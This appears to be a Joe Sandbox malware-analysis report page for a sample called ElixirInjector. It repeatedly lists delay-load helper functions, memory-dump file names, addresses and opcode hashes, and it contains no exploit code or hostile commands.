Source File: 00000000.00000002.2185791998.0000000000F11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F10000, based on PE: true

Associated: 00000000.00000002.2185776696.0000000000F10000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2185820340.0000000000F43000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2185843092.0000000000F4E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2185843092.0000000000F55000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2185843092.0000000000F72000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2185906055.0000000000F73000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f10000_ElixirInjector.jbxd

Similarity

API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
String ID:
API String ID: 1269201914-0
Opcode ID: 7309c87647e8693cd061a63a76f2cf35fe76c31ccddb51af901c2b9ad02af738
Instruction ID: d34d32543598b4f2baa57ae2a7568b889e3ec8e3215990d3fd93b55eb094ebfc
Opcode Fuzzy Hash: 7309c87647e8693cd061a63a76f2cf35fe76c31ccddb51af901c2b9ad02af738
Instruction Fuzzy Hash: 88B012D225A050BC314452453D02D3B021DC2C2B11330C03FFC49C0081E890EC003473

Function 00F2E232 Relevance: 1.5, APIs: 1, Instructions: 10COMMON

Download Yara Rule

APIs

___delayLoadHelper2@8.DELAYIMP ref: 00F2E1E3

Part of subcall function 00F2E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00F2E8D0
Part of subcall function 00F2E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00F2E8E1

Memory Dump Source

Source File: 00000000.00000002.2185791998.0000000000F11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F10000, based on PE: true

Associated: 00000000.00000002.2185776696.0000000000F10000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2185820340.0000000000F43000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2185843092.0000000000F4E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2185843092.0000000000F55000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2185843092.0000000000F72000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2185906055.0000000000F73000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f10000_ElixirInjector.jbxd

Similarity

API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
String ID:
API String ID: 1269201914-0
Opcode ID: 98325dd412a744437d4caea67ad9e4e5c4cbdeb6f803a76c473923d8d0657ae8
Instruction ID: abaa6a6dc71df354006473619717d2655e34e5aa5cedc23fc8878fa1b05c216d
Opcode Fuzzy Hash: 98325dd412a744437d4caea67ad9e4e5c4cbdeb6f803a76c473923d8d0657ae8
Instruction Fuzzy Hash: 0FB012E2259020BC314452453E02D3B021CC2C1F11331803FFC09C0081EC80AE013473

Function 00F2E23C Relevance: 1.5, APIs: 1, Instructions: 10COMMON

Download Yara Rule

APIs

___delayLoadHelper2@8.DELAYIMP ref: 00F2E1E3

Part of subcall function 00F2E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00F2E8D0
Part of subcall function 00F2E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00F2E8E1

Memory Dump Source

Source File: 00000000.00000002.2185791998.0000000000F11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F10000, based on PE: true

Associated: 00000000.00000002.2185776696.0000000000F10000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2185820340.0000000000F43000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2185843092.0000000000F4E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2185843092.0000000000F55000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2185843092.0000000000F72000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2185906055.0000000000F73000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f10000_ElixirInjector.jbxd

Similarity

API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
String ID:
API String ID: 1269201914-0
Opcode ID: 7f1c9c0b063a7ed56a6662a173bae5c8c706a48fc0615acc31b1407036dec2a7
Instruction ID: 374b651f183a6b297868a205eb098ebbae4f8f51820670c1c08bdf9d38d4002f
Opcode Fuzzy Hash: 7f1c9c0b063a7ed56a6662a173bae5c8c706a48fc0615acc31b1407036dec2a7
Instruction Fuzzy Hash: 11B012E2259010BC314452463D02D3B031CC2C1F11331803FFC09C0081E880AD003473

Function 00F2E228 Relevance: 1.5, APIs: 1, Instructions: 10COMMON

Download Yara Rule

APIs

___delayLoadHelper2@8.DELAYIMP ref: 00F2E1E3

Part of subcall function 00F2E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00F2E8D0
Part of subcall function 00F2E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00F2E8E1

Memory Dump Source

Source File: 00000000.00000002.2185791998.0000000000F11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F10000, based on PE: true

Associated: 00000000.00000002.2185776696.0000000000F10000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2185820340.0000000000F43000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2185843092.0000000000F4E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2185843092.0000000000F55000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2185843092.0000000000F72000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2185906055.0000000000F73000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f10000_ElixirInjector.jbxd

Similarity

API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
String ID:
API String ID: 1269201914-0
Opcode ID: 8ab1a2c24c30306b92df9df5b55d6cfc493193f743f731ca7e9fe2d6a164a820
Instruction ID: 13d80cd0c0f0cd0647ed3923fb23c682f0297434b12d0c77e9b98ee8d6427daf
Opcode Fuzzy Hash: 8ab1a2c24c30306b92df9df5b55d6cfc493193f743f731ca7e9fe2d6a164a820
Instruction Fuzzy Hash: 66B012E2259110BC318452453D02D3B021CC2C1F11331813FFC09C0481E880AD403473

Function 00F2E21E Relevance: 1.5, APIs: 1, Instructions: 10COMMON

Download Yara Rule

APIs

___delayLoadHelper2@8.DELAYIMP ref: 00F2E1E3

Part of subcall function 00F2E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00F2E8D0
Part of subcall function 00F2E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00F2E8E1

Memory Dump Source

Source File: 00000000.00000002.2185791998.0000000000F11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F10000, based on PE: true

Associated: 00000000.00000002.2185776696.0000000000F10000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2185820340.0000000000F43000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2185843092.0000000000F4E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2185843092.0000000000F55000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2185843092.0000000000F72000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2185906055.0000000000F73000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f10000_ElixirInjector.jbxd

Similarity

API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
String ID:
API String ID: 1269201914-0
Opcode ID: f530e74690b62da275c47cf27aa0c6dd25a903c8a38c27c029cf2c5e32567f0f
Instruction ID: f9cefc27c24f67d46613e79e5d07f31c82602b7af7a961dfdcf70a9f989da4b6
Opcode Fuzzy Hash: f530e74690b62da275c47cf27aa0c6dd25a903c8a38c27c029cf2c5e32567f0f
Instruction Fuzzy Hash: C5B012E2259010BC314452453D02D3B021CC2C2F11331C03FFC49C0081E880ED003473

Function 00F2E200 Relevance: 1.5, APIs: 1, Instructions: 10COMMON

Download Yara Rule

APIs

___delayLoadHelper2@8.DELAYIMP ref: 00F2E1E3

Part of subcall function 00F2E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00F2E8D0
Part of subcall function 00F2E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00F2E8E1

Memory Dump Source

Source File: 00000000.00000002.2185791998.0000000000F11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F10000, based on PE: true

Associated: 00000000.00000002.2185776696.0000000000F10000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2185820340.0000000000F43000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2185843092.0000000000F4E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2185843092.0000000000F55000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2185843092.0000000000F72000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2185906055.0000000000F73000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f10000_ElixirInjector.jbxd

Similarity

API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
String ID:
API String ID: 1269201914-0
Opcode ID: 27a0e8ecdbd2d57a6a345697eae52a9ac924b72a0c137975592d15ed24b08c7f
Instruction ID: 0d9d06b1bdb1c252af9aad548e3a073269aeed9be0a79d156979bf539573448d
Opcode Fuzzy Hash: 27a0e8ecdbd2d57a6a345697eae52a9ac924b72a0c137975592d15ed24b08c7f
Instruction Fuzzy Hash: 8EB012D2359150BC318453453D02D3B021CC2C1B11330C13FFC09C0581E880AC443473

Function 00F2E20A Relevance: 1.5, APIs: 1, Instructions: 10COMMON

Download Yara Rule

APIs

___delayLoadHelper2@8.DELAYIMP ref: 00F2E1E3

Part of subcall function 00F2E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00F2E8D0
Part of subcall function 00F2E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00F2E8E1

Memory Dump Source

Source File: 00000000.00000002.2185791998.0000000000F11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F10000, based on PE: true

Associated: 00000000.00000002.2185776696.0000000000F10000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2185820340.0000000000F43000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2185843092.0000000000F4E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2185843092.0000000000F55000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2185843092.0000000000F72000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2185906055.0000000000F73000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f10000_ElixirInjector.jbxd

Similarity

API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
String ID:
API String ID: 1269201914-0
Opcode ID: 5bf05c2593a52365a98b6854580bdbe9e37165b4c482c65f8b2cf8d778621a56
Instruction ID: 3855b23f89b2a5f6a097fdd8f41967aa56a6a97643df89044d83b2534add3ee2
Opcode Fuzzy Hash: 5bf05c2593a52365a98b6854580bdbe9e37165b4c482c65f8b2cf8d778621a56
Instruction Fuzzy Hash: 85B012D2259020BC314453453E02D3B021CC2C1B11330C03FFC09C0181EC90AD093473

Function 00F2E44B Relevance: 1.5, APIs: 1, Instructions: 10COMMON

Download Yara Rule

APIs

___delayLoadHelper2@8.DELAYIMP ref: 00F2E3FC

Part of subcall function 00F2E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00F2E8D0
Part of subcall function 00F2E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00F2E8E1

Memory Dump Source

Source File: 00000000.00000002.2185791998.0000000000F11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F10000, based on PE: true

Associated: 00000000.00000002.2185776696.0000000000F10000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2185820340.0000000000F43000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2185843092.0000000000F4E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2185843092.0000000000F55000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2185843092.0000000000F72000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2185906055.0000000000F73000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f10000_ElixirInjector.jbxd

Similarity

API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
String ID:
API String ID: 1269201914-0
Opcode ID: 694a4853e93fc15104402ccc59afcae4ae58db7cac11c4a397a9da0853364bc2
Instruction ID: 426155039a0ac841972b22c27a748d3a9f8499314580ba2827fb6ff272b7f900
Opcode Fuzzy Hash: 694a4853e93fc15104402ccc59afcae4ae58db7cac11c4a397a9da0853364bc2
Instruction Fuzzy Hash: 5AB012E225A020BC3144D1053C02D77060CC0C1B21332D02FFC4CC1081E8408C043473

Function 00F2E423 Relevance: 1.5, APIs: 1, Instructions: 10COMMON

Download Yara Rule

APIs

___delayLoadHelper2@8.DELAYIMP ref: 00F2E3FC

Part of subcall function 00F2E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00F2E8D0
Part of subcall function 00F2E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00F2E8E1

Memory Dump Source

Source File: 00000000.00000002.2185791998.0000000000F11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F10000, based on PE: true

Associated: 00000000.00000002.2185776696.0000000000F10000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2185820340.0000000000F43000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2185843092.0000000000F4E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2185843092.0000000000F55000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2185843092.0000000000F72000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2185906055.0000000000F73000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f10000_ElixirInjector.jbxd

Similarity

API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
String ID:
API String ID: 1269201914-0
Opcode ID: 8b1aa002bab7bd50e2008520b682b3aff05161180a952ce0e05be39cdacdb8bb
Instruction ID: 19bda5b9476c141fa84e236ccbb4735504f1bae41ae9661133bb5a0cfe67a5f2
Opcode Fuzzy Hash: 8b1aa002bab7bd50e2008520b682b3aff05161180a952ce0e05be39cdacdb8bb
Instruction Fuzzy Hash: 69B012F225A020BC3144D1053C02D77060CC0C2F21333D02FFC4CC1081E8448E003473

Function 00F2E419 Relevance: 1.5, APIs: 1, Instructions: 10COMMON

Download Yara Rule

APIs

___delayLoadHelper2@8.DELAYIMP ref: 00F2E3FC

Part of subcall function 00F2E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00F2E8D0
Part of subcall function 00F2E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00F2E8E1

Memory Dump Source

Source File: 00000000.00000002.2185791998.0000000000F11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F10000, based on PE: true

Associated: 00000000.00000002.2185776696.0000000000F10000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2185820340.0000000000F43000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2185843092.0000000000F4E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2185843092.0000000000F55000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2185843092.0000000000F72000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2185906055.0000000000F73000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f10000_ElixirInjector.jbxd

Similarity

API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
String ID:
API String ID: 1269201914-0
Opcode ID: 4ebb0f1db5122a95f0a044e7e31cd61bcc630df9f8a8f045722c5953f1a5a9a0
Instruction ID: 760a65c6ece98a524a97a91df4fb82a9a0e926054943fa47782715e278ca253a
Opcode Fuzzy Hash: 4ebb0f1db5122a95f0a044e7e31cd61bcc630df9f8a8f045722c5953f1a5a9a0
Instruction Fuzzy Hash: B2B012E225A0307C3144D1053D02DB7060CC0C1B21332D02FF90CC1081E8404C093473

Function 00F2E5B1 Relevance: 1.5, APIs: 1, Instructions: 10COMMON

Download Yara Rule

APIs

___delayLoadHelper2@8.DELAYIMP ref: 00F2E580

Part of subcall function 00F2E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00F2E8D0
Part of subcall function 00F2E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00F2E8E1

Memory Dump Source

Source File: 00000000.00000002.2185791998.0000000000F11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F10000, based on PE: true

Associated: 00000000.00000002.2185776696.0000000000F10000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2185820340.0000000000F43000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2185843092.0000000000F4E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2185843092.0000000000F55000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2185843092.0000000000F72000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2185906055.0000000000F73000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f10000_ElixirInjector.jbxd

Similarity

API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
String ID:
API String ID: 1269201914-0
Opcode ID: 7415938e6c1bbf2c4a855532b6e51ed564f628b171f96c3dd8028cd09dfa386c
Instruction ID: 8b09dbe6c57eee33e82a3bfb738f0d052a4225e05225fce03ca4f9e304558f8e
Opcode Fuzzy Hash: 7415938e6c1bbf2c4a855532b6e51ed564f628b171f96c3dd8028cd09dfa386c
Instruction Fuzzy Hash: 31B012C266A1207C318451547C03D37021CC1C5B10336D22FF80CC1482F8845C543473

Function 00F2E5A7 Relevance: 1.5, APIs: 1, Instructions: 10COMMON

Download Yara Rule

APIs

___delayLoadHelper2@8.DELAYIMP ref: 00F2E580

Part of subcall function 00F2E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00F2E8D0
Part of subcall function 00F2E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00F2E8E1

Memory Dump Source

Source File: 00000000.00000002.2185791998.0000000000F11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F10000, based on PE: true

Associated: 00000000.00000002.2185776696.0000000000F10000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2185820340.0000000000F43000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2185843092.0000000000F4E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2185843092.0000000000F55000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2185843092.0000000000F72000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2185906055.0000000000F73000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f10000_ElixirInjector.jbxd

Similarity

API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
String ID:
API String ID: 1269201914-0
Opcode ID: 84a34b6db307e0c9c7929812e3c1fd09b484dc06bcce620e986efd0f0fa46d29
Instruction ID: 0da62288bdfab4ba2819bbbe58cce9f7d4eed4d2f2c5b1f499356446db188d80
Opcode Fuzzy Hash: 84a34b6db307e0c9c7929812e3c1fd09b484dc06bcce620e986efd0f0fa46d29
Instruction Fuzzy Hash: E5B012C266A0307C314451547D03D37021CC1C5B10376D23FF80CC1082FC845D153473

Function 00F2E593 Relevance: 1.5, APIs: 1, Instructions: 10COMMON

Download Yara Rule

APIs

___delayLoadHelper2@8.DELAYIMP ref: 00F2E580

Part of subcall function 00F2E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00F2E8D0
Part of subcall function 00F2E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00F2E8E1

Memory Dump Source

Source File: 00000000.00000002.2185791998.0000000000F11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F10000, based on PE: true

Associated: 00000000.00000002.2185776696.0000000000F10000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2185820340.0000000000F43000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2185843092.0000000000F4E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2185843092.0000000000F55000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2185843092.0000000000F72000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2185906055.0000000000F73000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f10000_ElixirInjector.jbxd

Similarity

API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
String ID:
API String ID: 1269201914-0
Opcode ID: fa091d43ee326539d63c32693cc3fb9b4ae9963e620f1dd6a72bd68dd81cd5c1
Instruction ID: f5d703f82ad933b98bd3af09956018cee42c6f97d7fc3b963c3aebf762282db5
Opcode Fuzzy Hash: fa091d43ee326539d63c32693cc3fb9b4ae9963e620f1dd6a72bd68dd81cd5c1
Instruction Fuzzy Hash: 19B012C266A0207D314451543C03D77034CC1C1B20332D02FF80CC1081F8844C243473

Function 00F2E546 Relevance: 1.5, APIs: 1, Instructions: 10COMMON

Download Yara Rule

APIs

___delayLoadHelper2@8.DELAYIMP ref: 00F2E51F

Part of subcall function 00F2E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00F2E8D0
Part of subcall function 00F2E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00F2E8E1

Memory Dump Source

Source File: 00000000.00000002.2185791998.0000000000F11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F10000, based on PE: true

Associated: 00000000.00000002.2185776696.0000000000F10000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2185820340.0000000000F43000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2185843092.0000000000F4E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2185843092.0000000000F55000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2185843092.0000000000F72000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2185906055.0000000000F73000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f10000_ElixirInjector.jbxd

Similarity

API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
String ID:
API String ID: 1269201914-0
Opcode ID: f718a51072680365faf172140869c978281c9ac175bb0294315c1486d0d1773c
Instruction ID: c3e2a5d4d7af22c0907f150757e5b31f1a7d2ca4c33af3682ce2d8a9809fef72
Opcode Fuzzy Hash: f718a51072680365faf172140869c978281c9ac175bb0294315c1486d0d1773c
Instruction Fuzzy Hash: B7B012C23691107C324451087C03D3B050CC0C6F14331D22FF84CC4181F8405C443873

Function 00F2E532 Relevance: 1.5, APIs: 1, Instructions: 10COMMON

Download Yara Rule

APIs

___delayLoadHelper2@8.DELAYIMP ref: 00F2E51F

Part of subcall function 00F2E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00F2E8D0
Part of subcall function 00F2E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00F2E8E1

Memory Dump Source

Source File: 00000000.00000002.2185791998.0000000000F11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F10000, based on PE: true

Associated: 00000000.00000002.2185776696.0000000000F10000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2185820340.0000000000F43000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2185843092.0000000000F4E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2185843092.0000000000F55000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2185843092.0000000000F72000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2185906055.0000000000F73000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f10000_ElixirInjector.jbxd

Similarity

API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
String ID:
API String ID: 1269201914-0
Opcode ID: cb6c8f0a9fd40c693614a9e718fc65415c989c1da778a91c446b19168c3b6318
Instruction ID: 01c85c2bb457d109c3f5f7106245315700ac6bf06202f541d51650b5fab39766
Opcode Fuzzy Hash: cb6c8f0a9fd40c693614a9e718fc65415c989c1da778a91c446b19168c3b6318
Instruction Fuzzy Hash: 3DB012C23690107D314451083C03E7B054CD0C2F14331D02FF84CC4181F8404C003873

Function 00F2E528 Relevance: 1.5, APIs: 1, Instructions: 10COMMON

Download Yara Rule

APIs

___delayLoadHelper2@8.DELAYIMP ref: 00F2E51F

Part of subcall function 00F2E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00F2E8D0
Part of subcall function 00F2E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00F2E8E1

Memory Dump Source

Source File: 00000000.00000002.2185791998.0000000000F11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F10000, based on PE: true

Associated: 00000000.00000002.2185776696.0000000000F10000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2185820340.0000000000F43000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2185843092.0000000000F4E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2185843092.0000000000F55000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2185843092.0000000000F72000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2185906055.0000000000F73000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f10000_ElixirInjector.jbxd

Similarity

API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
String ID:
API String ID: 1269201914-0
Opcode ID: 3577ca437fb646cfca14dce091f061d14e169372f194deeac6e1abb825af4bd3
Instruction ID: 7af470e88bffb9b8125eb101ae38fdb4bdf42e3caa3187eb169a2566ad8163de
Opcode Fuzzy Hash: 3577ca437fb646cfca14dce091f061d14e169372f194deeac6e1abb825af4bd3
Instruction Fuzzy Hash: ABB012C23690607C314451083D03D7B090CC0C2F14331D02FF84CC4181F8404C013873

Function 00F2E50D Relevance: 1.5, APIs: 1, Instructions: 10COMMON

Download Yara Rule

APIs

___delayLoadHelper2@8.DELAYIMP ref: 00F2E51F

Part of subcall function 00F2E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00F2E8D0
Part of subcall function 00F2E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00F2E8E1

Memory Dump Source

Source File: 00000000.00000002.2185791998.0000000000F11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F10000, based on PE: true

Associated: 00000000.00000002.2185776696.0000000000F10000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2185820340.0000000000F43000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2185843092.0000000000F4E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2185843092.0000000000F55000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2185843092.0000000000F72000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2185906055.0000000000F73000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f10000_ElixirInjector.jbxd

Similarity

API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
String ID:
API String ID: 1269201914-0
Opcode ID: 0baa7e719ccd0a4e7d502c74a4311a90dba6c3a0adbd3e271cd2258951c01ae0
Instruction ID: 38a79aac65c796465fa51d150a5604c9fd65dffdb158dbb63b2e755a04228b23
